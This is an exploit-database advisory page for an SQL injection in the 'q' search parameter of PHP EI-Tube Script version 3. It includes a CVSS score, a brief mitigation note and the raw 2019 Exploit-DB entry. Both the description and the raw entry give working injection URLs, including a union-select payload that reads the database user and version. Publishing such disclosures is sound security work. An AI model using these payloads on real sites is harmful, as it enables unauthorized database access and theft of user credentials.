header-logo
Suggest Exploit
vendor:
EI-Tube Script
by:
Meisam Monsef
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: EI-Tube Script
Affected Version From: 3
Affected Version To: 3
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu
2019

PHP EI-Tube Script – Sql Injection

An attacker can inject malicious SQL commands into the 'q' parameter of the 'search' page of the PHP EI-Tube Script. This can be done by sending a specially crafted HTTP request to the vulnerable page, such as 'https://target/search?q=-999%22+[sql+command]+%23' or 'https://target/search?q=-999%22+union+select+1,user(),3,4,5,version()+%23'. This can allow an attacker to gain access to sensitive information from the database, such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

# Exploit Title: PHP EI-Tube Script - Sql Injection
# Date: 2019-02-21
# Exploit Author: Meisam Monsef - meisamrce@gmail.com
# Vendor Homepage: https://codecanyon.net/item/eitube-youtube-api-v3-site-builder/22722912?s_rank=17
# Version: 3
# Tested on: ubuntu
# special thanks : Alireza Noorkazemi - A-H - Akhzari -
# Net Hunter (Pouya) - M.Azizi - EBI -Navid - Shahab RA - SAM.SH
# M.I - Nikavar - Hosseini
# very special thanks : esecurity.ir

Exploit:
https://target/search?q=-999%22+[sql+command]+%23
https://target/search?q=-999%22+union+select+1,user(),3,4,5,version()+%23

Navigation

Suggest Exploit

Services By CQR